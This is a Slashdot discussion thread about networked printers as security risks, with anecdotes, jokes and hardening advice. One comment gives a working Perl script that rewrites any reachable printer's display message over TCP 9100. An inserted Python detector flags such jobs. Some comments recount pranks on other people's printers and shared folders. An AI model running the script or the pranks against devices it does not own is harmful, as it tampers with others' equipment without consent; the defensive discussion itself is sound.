Printers Vulnerable To Security Threats
jcatcw writes "Networked printers are more vulnerable to attack than many organizations realize. Symantec has logged vulnerabilities in five brands of network printers. Printers outside firewalls, for ease of remote printing, may also be open to easy remote code execution. They can be possible launching pads for attacks on the rest of the network. Disabling services that aren't needed and keeping up with patches are first steps to securing them." From the article: "Security experts say that printers are loaded with more complex applications than ever, running every vulnerable service imaginable, with little or no risk management or oversight.... [N]etworked printers need to be treated like servers or workstations for security purposes — not like dumb peripherals."
they run linux!
Of course! This is slashdot!
Over the past several years, if you did a random port scan of the Internet (nmap -iR) the majority of open telnet (tcp port 23) servers were print servers that let you telnet in and change all sorts of settings.
------ Take away the right to say fuck and you take away the right to say fuck the government.
Dwight:
At 8 AM today, someone poisons the coffee. Do NOT drink the coffee. More instructions will follow.
Cordially, Future Dwight.
One of my colleagues told me about a printer that started printing page after page of funny characters. It seems there was a virus in the network, trying to write itself on all shares - of which the printer had one.
How much is one of those printers able to do? Printers dedicated to big offices have a pretty powerful processor, lots of RAM, hard drive. Taking control of such a printer could be just as useful for a black-hat cracker as taking control of a computer there, with the bonus that printers aren't usual suspects for infections.
...print out pictures of Viagra?
"It does not do to leave a live dragon out of your calculations, if you live near him." - Tolkien
Printers have been network servers for a long time now. I have a 1995 vintage networked laser from Digital Equipment Corporation (rest in pieces) and its manual tells the exact procedure to get to the command line, by using a default password and telnet. Yes, this printer has a unix-like command line interface for configuring its print server functions, and anyone who knows the IP address and the password can get in. Needless to say I've been careful to keep the printer behind my firewall box.
Anyone remember the story about the guy who wrote a "visual basic" virus to send the O RLY owl to all printers in the company?
Maybe we'll see a lot of these coming, it'll be fun *hee hee hee* {devilish laugh}. I don't have a printer }:-]
Syllable 0.62 is here at last!!!
Even worse, such attacks may jam the printers, making it impossible to print out important Dilbert cartoons.
Vincent J. Murphy
Spandex Justice
Was years ago I hacked my employer's printer to say: "Insert Coin" instead of "Ready" and "Feed Me" instead of "Paper tray empty" ... and I know I could have done a lot worse.
Nick Waterman, Sr Tech Director, #include <stddisclaimer>
You don't want to become a victim of printer hacking. A malicious printer hacker could print out sheet music of copyrighted songs, stills from copyrighted movies, or child pornography - leaving you a target of litigation from the *AA or worse. Not to mention all the juvenile pranks like printing all your valuable company memos in l33t speak.
Protect your printers today!
I wonder when Symantec will release their first security software suite for printers...
Insisting on "correct" English is like saying that there is only one, definitive recipe for chili.
On many if not most college campuses the printers are administered and accounted for by a system tied to a student id. Each student can get so many free prints per semester and can pay per print after exceeding that. Malicious code executing on a print server could sniff all the student accounts accessing the printer.
http://www.vistahelpforum.com/
Windows Vista Help Forum
Laugh if you want, but this was what happened to Iraq on the eve of the Gulf War. A modified printer was put onto their defense computer network by an Allied operative. Right when the air war started, the bug fired up and brought down the network. Just because a threat sounds outlandish does not mean it isn't a real threat.
(The story was recounted in The Generals' War.)
A NYC lawyer blogs. http://www.chuangblog.com/
When I was at University many years ago we used to take advantage of the fact the Windows 95/98 users often didn't restrict access to printers when they connected their machines to the Windows network. We used to add their local printers as network printers on some anonymous workstation and print out pornographic material on the victim's printer in his apartment at the student home. I know it wasn't exploiting a vulnerability rather than an oversight by the owner of the remote machine, but the results when the victim's girlfriend came over for a visit and found the pictures lying in the printer tray were often amusing. Another gag exploited the fact that Windows 95/98 didn't give you the option to restrict the size of an SMB shared folder and even if it did many people didn't take advantage of it. So in the days of sub gigabyte sized hard drives a mischievously minded person could fill up a Windows workstation's hard drive with crap data by piling it into the shared folder.
An Indian-American Hindu committed to non-violent thought/speech/action alarmed by the global explosion of radical Islam
The big difference is that they're not managed the same by the IT department, which means that they don't get updates, don't have antivirus, etc.
Think back to all of the remote exploits that have come out for MSWindows in the last several years, then take another look at your printers.
Lacking <sarcasm> tags,
I figure it's safer to assume that anything connected to the network could be an attack point. If you have a network toy like some light-up furby that connects to the network and changes color based on packet throughput, that thing probably has no security whatsoever on it (even assuming it has embedded linux or something).
stuff |
Is this the cure for Freudian "printer envy"? It must be terrible when your printer feels vulnerable...
C|N>K
Symantec is really grasping at straws here. In the age of internet security, why anyone would put a printer outside the firewall is too far beyond me to comprehend. Any firewall admin should be able to put rules in place for remote printing. And for that matter, why does anyone need to remotely print? Anybody heard of email? Ol' deskjet at home too slow? Users in the office too lazy? Too many pebcak errors? Remote printing may be the most worthless of the worthless network setups. Also, why are people not using external secure computing devices? This stuff is not that expensive for the return it gives.
Symantec is quaking in its boots and instead of shouting fire in a theater they should be looking at what they have and capitalizing on it. Why else would they buy Veritas? I'm sure it wasn't because they wanted to add AV to it.
Imagine those companies that sell expensive toner and ink cartridges pairing up with someone to write some malicious code to burn through your printing supplies faster.
It won't be long before you hear about something like the "Page_Blackout" or "Toner_Drain" worm.
"Printers worldwide slammed with requests to print the goatse man"
Monstar L
Given my past experience with the high quality of Symantec products we'll be switching to clay tablets and cuneiform.
In the long run, it will be easier and more cost effective.
I find, use and patch some problems with [ancestor of] these printers from 1998. I have to run some tests for the Y2K project in that time, and we so much open telnet attack that can be made from printer, we design some special firewall and network rules at that time.
Ceci n'est pas une Signature !
and this is news to you, please get out of the business.
The Kruger Dunning explains most post on
Isn't this what is called a fax machine?
Unlike, of course, printers behind firewalls, which are not at all open to remote code execution, since there's no chance that anything attached to the firewalled network will ever be hacked. Ah, the magic of the firewall.
- telnetting in
- For a base of operations
- As an aid in information gathering
- Denial of service
- Printing garbage as an annoyance
- Causing apparent hardware failure, distracting service personnel from real attacks
- Damaging the device with invalid NVRAM
- Loss of integrity: modify interpreter to change printing behavior in some mission-sensitive way.
For example, you could display "028*: Radon Discharge Hazard" or some other nonsense trouble symptoms at random intervals on the control panel. The techs in charge would then have to deal with that problem, while you attack their database server or other target. With a modified Postscript interpreter, you could insert random words or even carefully selected phrases in documents as they printed, using the same font that the document prints. How often do people proofread the text of a document they just proofread on screen? Only if they printed it to proofread it, and even then they might not notice. Also, printers in network environments often have file storage space, which makes them a target both to corrupt, if their storage is used in production. If the area is not used in production, it can be used by a rogue to hide things, since typically no one looks at that storage area if it's not in production.
sigs, as if you care.
``PC Load Letter? What the fuck does that mean?''
People print sensitive documents to networked printers all the time. You just hang around the printer with your coffee waiting for 'your' job and either clear up the un-collected jobs that are always lying around, or grab stuff as it comes off the printer. The owner will always re-submit the job without a second thought.
Once I was a four stone apology. Now I am two separate gorillas.
... but it's the only place I can install a UT3 server at work and not have the sysadmins find it.
Happy fragging,
-BA
Something similar has already happened I think although not intentionally. Some viruses in their attempt to spread themselves would send a bunch of junk out, and if a printer was on the other side then it would start spewing out garbage. I've also seen nmap scans lock up print servers / printers as well - sometimes with a line or two of stuff printed off.
#!/usr/bin/perl
#
# Printer Fun
#
use strict;
use IO::Socket;
use Getopt::Std;

my %opt;
my $data;
my $socket;

print "\nPrinter Fun :-)\n";

getopts("r:t:h", \%opt);
usage() if not %opt or $opt{h};

if ($opt{t} and $opt{r}) {
    print "[+] Setting the printer ready message\n";
    # Echo the message as two 16-character lines
    print " " . substr($opt{r}, 0,16) . "\n";
    print " " . substr($opt{r}, 16,16) . "\n";

    # PJL job: UEL marker, one RDYMSG command, closing UEL marker
    $data = "\033%-12345X" .
            "\@PJL RDYMSG DISPLAY=\"" .
            "$opt{r}\"\r\n\033%-12345X\r\n";

    # Send it to the raw printing port (TCP 9100)
    $socket = IO::Socket::INET->new(
        PeerAddr=>$opt{t},
        PeerPort=>9100,
        Proto =>'tcp')
        or die "[-] Couldn't connect to $opt{t}:9100 : $!\n\n";
    print $socket $data;
    close ($socket);
    print "[+] DONE!\n\n";
} else {
    print "\n[-] Specify -r and -t!\n\n";
}

sub usage {
    print "usage: $0 [-r ] [-t ] [-h]\n";
    print "-r : ready message display\n";
    print "-t : target\n";
    print "-h : help/usage\n";
    print "example: $0 -r \"INSERT COIN\" -t 172.16.10.20\n\n";
    exit;
}
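The defender's side of the script above, as an added example that is not part of the original comment: a parser for a reassembled TCP 9100 stream that pulls out the PJL commands and flags a display-message change arriving with no page data or from a host other than the print server. It goes slightly beyond the script by also matching OPMSG and STMSG, the sibling PJL commands that set panel text; the function names, IP addresses and sample streams are constructed, and the idea that jobs normally reach the printer through one print server is an assumption.

```python
import re

UEL = b"\x1b%-12345X"  # Universal Exit Language marker ("\033%-12345X" in the script)
DISPLAY_CMDS = {"RDYMSG", "OPMSG", "STMSG"}  # PJL commands that set panel text
PJL_LINE = re.compile(rb"@PJL(?:[ \t]+([A-Za-z]+)[ \t]*(.*))?")
DISPLAY_ARG = re.compile(rb'DISPLAY\s*=\s*"([^"]*)"', re.IGNORECASE)


def parse_pjl(payload):
    """Split one reassembled port-9100 stream into PJL commands and page data."""
    commands, has_page_data = [], False
    for segment in payload.split(UEL):
        in_page_data = False
        for line in re.split(rb"\r?\n", segment):
            if in_page_data:
                has_page_data = has_page_data or bool(line.strip())
                continue
            m = PJL_LINE.fullmatch(line)
            if m is None:
                if line.strip():  # anything that is not PJL is job content
                    has_page_data = in_page_data = True
                continue
            if m.group(1) is None:  # bare "@PJL" line, a no-op
                continue
            name = m.group(1).upper().decode("ascii")
            commands.append((name, m.group(2).strip()))
            if name == "ENTER":  # ENTER LANGUAGE=... hands over to the page data
                in_page_data = True
    return commands, has_page_data


def inspect_stream(src_ip, payload, print_servers):
    """Summarise one stream and decide whether it deserves an alert."""
    commands, has_page_data = parse_pjl(payload)
    messages = []
    for name, args in commands:
        if name in DISPLAY_CMDS:
            m = DISPLAY_ARG.search(args)
            messages.append(m.group(1).decode("latin-1") if m else "")
    control_only = bool(commands) and not has_page_data
    from_print_server = src_ip in print_servers
    return {
        "src": src_ip,
        "display_messages": messages,
        "control_only": control_only,
        "from_print_server": from_print_server,
        # Panel text changed by a job that prints nothing, or by an unexpected host
        "alert": bool(messages) and (control_only or not from_print_server),
    }


# Constructed sample data (assumed addresses, not from the thread)
PRINT_SERVERS = {"10.0.5.10"}
PRANK_STREAM = UEL + b'@PJL RDYMSG DISPLAY="INSERT COIN"\r\n' + UEL + b"\r\n"
NORMAL_STREAM = (
    UEL + b'@PJL JOB NAME="report"\r\n@PJL ENTER LANGUAGE=POSTSCRIPT\r\n'
    b"%!PS\n72 720 moveto showpage\n" + UEL + b"@PJL EOJ\r\n" + UEL
)

if __name__ == "__main__":
    for src, stream in (("10.0.5.77", PRANK_STREAM), ("10.0.5.10", NORMAL_STREAM)):
        print(inspect_stream(src, stream, PRINT_SERVERS))
```
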
Display "PC LOAD LETTER" on the printer. It'll be offline shortly thereafter.
I heard Barbara Boxer supported a bill to install anti security-threat lasers on all printers within 20 years.
The whole reason he went into open source movement is because some printer was running proprietary software that he couldn't fix. At least now anyone can download source code from HP website and modify the way your printer works in any way they want.
Hopefully they'll come out with a patch that will stop printers from printing out pictures of Whoopi Goldberg naked. That happened in our office before. Poor Charles is blind.
Previewing comments are for sissies!
I call SKYNET on this one! I respond to maybe too many network, IT stories this way, but this has to set off warning lights.
Mod parent down, mod first child up.
FX of Phenoelit gave an amazing talk on this at CanSecWest/core03 back in 2003 that outlined how to turn a JetDirect printer into a webserver, fileserver or even a port scanner! We all had a huge chuckle at the thought of someone tracking down a port scanner on the network only to find it was coming from an HP printer.
The entire presentation is still available online in both PDF and PPT format.
The tools used to hack the printers are available here.
Hey Smith.... are you printing something?
No... why do you ask?
Well the printer's been printing something for the last ten minutes... let me see...
AUUUUGH! MY EYES!
~lets see some anchor report on this without bursting into fits of uncontrollable laughter...
i first read this as "Pirates Vulnerable to Security Threats"
Why make printers so "smart" to begin with? Used to be, a man was a man and a printer was a printer. It did what its master told it. The things had just enough internal logic to interpret the voltage differences on the RS232 pins, and maybe a few K of RAM (hah!) to buffer the jobs.
Now they have minds of their own. *Grumble* visions of departmental HP printers that never seemed to be configured properly, always displaying bizarre diagnostic messages
Even a $150 Brother all-in-one machine at the office is screwed up, won't print and says "end of toner life" though a reboot and shake the cartridge convinces it to print for a few pages.
it's = "it is"; its = possessive. E.g., it's flapping its wings.
The main network printer for my workgroup is the copier down the hall. Copiers can increasingly be used for espionage. This is actually nothing new, the CIA had Xerox outfit copiers in the Soviet Embassy with cameras to photograph the documents being copied.
Nowadays, many copiers don't use traditional xerography, but are just fast scanners with printers attached. The network copier/printer down the hall can be used as a document scanner, and even spits out PDFs with searchable text. I don't think it would be too difficult, if one knew the model they were working on, to write a script to send off a PDF of every single document that's scanned, printed, or copied using that machine. In a business with lots of sensitive work, that could be as bad as letting someone rifle through your files after hours.
See the article on Internetsecurityofficer.com/evolution
http://internetsecurityofficer.com/evolution/index.php?blog=1&title=the_next_big_internet_attack&more=1&c=1&tb=1&pb=1
I work in the networked printer/multifunction industry. While HP is popular on desktops, other brands are gaining, and rule in the 50ppm+ arena. These devices come from other vendors like Canon, Sharp, Kyocera and Xerox. These multifunction devices provide scan, fax and print services and run a variety of OS's from VxWorks to Solaris. Yes Johnny, that means Windows XP embedded as well. Although I have to say, I haven't seen a DOS based controller in about 6 years.
We routinely receive questions about security, and help patch and configure these boxes to meet network security requirements as closely as possible. Unfortunately, we have limited access to the core OS, so we go as far as we can and work around the rest. Many vendors, especially those using Windows, provide controller patches with security fixes included. EFI even allows an admin to RDP in and use Windows Update to keep current.
These devices aren't perfect, but they have come a long way. That being said, if you haven't heard about this in the past, you have no business being in charge of network security. Multifunction devices today are just as powerful as your desktops and servers, running the same software. Admin control is limited, and vulnerabilities are a reality - note the recent Xerox vulnerability
I would say it is important to stay in contact with your local vendor/dealer to stay on top of these issues. We work with these products everyday, and receive regular notices about security issues and solutions, not to mention a wide variety of other product data. We are a resource, just like any other outside consultant, to help you get and stay secure.
"If there was a Penthouse for nerds, this could be the start of a great story"
Nerds are considered the primary audience. Penthouse IS for nerds, in a very direct way.
Somebody who actually gets laid on occasion is more likely to read Playboy (and the articles, for real).
I just got done working the North American International Auto Show, on one of the video production stages. One of the things we were forced to purchase from Cobo Hall was "Internet Service". Turns out they handed us our own dedicated T1 with 15 public IP addresses. I figured it out once I realized DHCP didn't work and found the paperwork to manually configure IP addresses.
Regardless, they gave us a network Printer/Fax/Copier. Guess what? It had one of the public IP addresses! I guess it was easier when setting up a temporary network to just hand out public IP addresses than it was to purchase a bunch of NAT routers. But there's a perfect example.
Shameless self promotion:
http://csrc.nist.gov/nissc/2000/proceedings/papers/034.pdf
Penetration Analysis of a XEROX Docucenter DC 230ST:. Assessing the Security of a Multi-purpose Office Machine.
Basically, there were many physical and network vulnerabilities that were of concern without even getting to a remote code execution problem.
Enjoy!
So you're the one who made all of our printers say "PC Load Letter".
WTF does that mean, anyway?
This could go far beyond simple security threats. Most of us have probably seen all the fax spam clogging up paper trays in offices everywhere. Imagine what the spammers could do with a vulnerability like this.
All of a sudden all of your documents are printing out with a new footer on every page. It'd be fscking priceless when the Human Resources girl prints out and distributes to everyone their updated copies of the company's sexual harassment policy containing an ad asking me if I wanted to enlarge my penis...
"I can be self-referential if I want to," said Tom, swiftly.
If you put ANY device outside a firewall, you deserve to get hacked. It is very simple to secure the device and still allow remote printing - no excuses.
There was a paper published about this years ago. The title of the paper is: Penetration Analysis of a XEROX Docucenter DC 230ST: Assessing the Security of a Multi-purpose Office Machine. link PDF Warning
Reading code is like reading the dictionary - you have to read half of it before you can go back and understand it.
There is code out there for running java based proxy servers on some networked printers, allowing you to gain further access into the network.
The printer thinks it's a router
http://yro.slashdot.org/article.pl?sid=04/11/13/015214
DOC Disinformation Obfuscation and Confusion
The carrot to FUD's stick
Many printers offer a postscript engine which, if strictly following postscript's guidelines while ignoring the security pleas, offer places on the internal storage to stash fonts and other things, those of course can be hijacked, and since printers (cough xerox cough) often have crappy inadequate configurations for the OS inside the box, (777 permissions on all files, for example) they allow things like the postscript engine to be used to deliver, replace, and execute remote code without so much as a password.
Clearly, as these vulnerabilities are found, the manufacturer often repairs the oversight with a simple workaround, like chroot jail for the engine or something, but many simply ignore the problem because the people in charge of pushing the units out the door have no care or clue when it comes to security.
... and the one on printers to build houses, imagine coming in to work in the morning and being confronted with a housing estate, only to find your printer had been hacked.
to have every printer behind a dedicated Linux LPRng/CUPS server.
"Nine times out of ten, starting a fire is not the best way to solve the problem." - my wife
Anyone seen this site?
http://www.irongeek.com/i.php?page=security/networkprinterhacking
It's a great resource for info on network printer hacking and vulnerabilities.
Obviously, these are the honking corporate printers, not your desktop inkjet.
Lacking <sarcasm> tags,
I always wanted to write a PostScript virus that would propagate from printer to printer and whose only other effect would be to replace every instance of the word "strategic" printed to the word "satanic". Never could figure out how to open a network port in PostScript though. You can use network ports in GhostScript but you have to open them with some other language and pass the file handle to GhostScript.
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
I understand they are MIPS embedded-type deals with specially designed firmware (TCP fingerprinting indicates that at least the network stack isn't derived from any public RT OS sources... so I'm guessing it's an HP original)
THIS THING CAN TURN ON A DIME, MACROSSZERO STYLE ALSO FUCK BETA, ~NYORON
One brand most people don't think of is Minolta (Shameless self plug). The machines can require authentication to gain access (NTLM, AD and other methods) to the control panel and web interface. Most of the copiers run a proprietary operating system along with nonstandard hardware. All of the ports can be turned opened/closed depending on needs, and IP filtering is included as well. Hell, it'll scan to email (which supports authentication) and to a Windows share (also uses authentication). SSL certificates, protocol and feature enabling/disabling. For someone to launch an attack from a newer Konica Minolta copier is next to impossible and any attacks that may get through are due only to a lazy network admin that does not utilize any features of the machine. Granted, these machines do not run Windows and are not a hard drive based OS, so they are not susceptible to virii. Some of the controllers we have are made by a third party (EFI) and these run a hard disk OS, but they are generally pretty secure (heavily modified Windows). Just my .02 from a copier IT perspective.
this is worse than the time a racoon got in the copier
there usually isn't any security (or very little at all)
i worked as a tester for the embedded OS group at a printer maker and you can do almost anything if you know what ports to connect to, etc. pretty fun stuff. they have a funnly functional shell, piping, redirects, and everything.
jason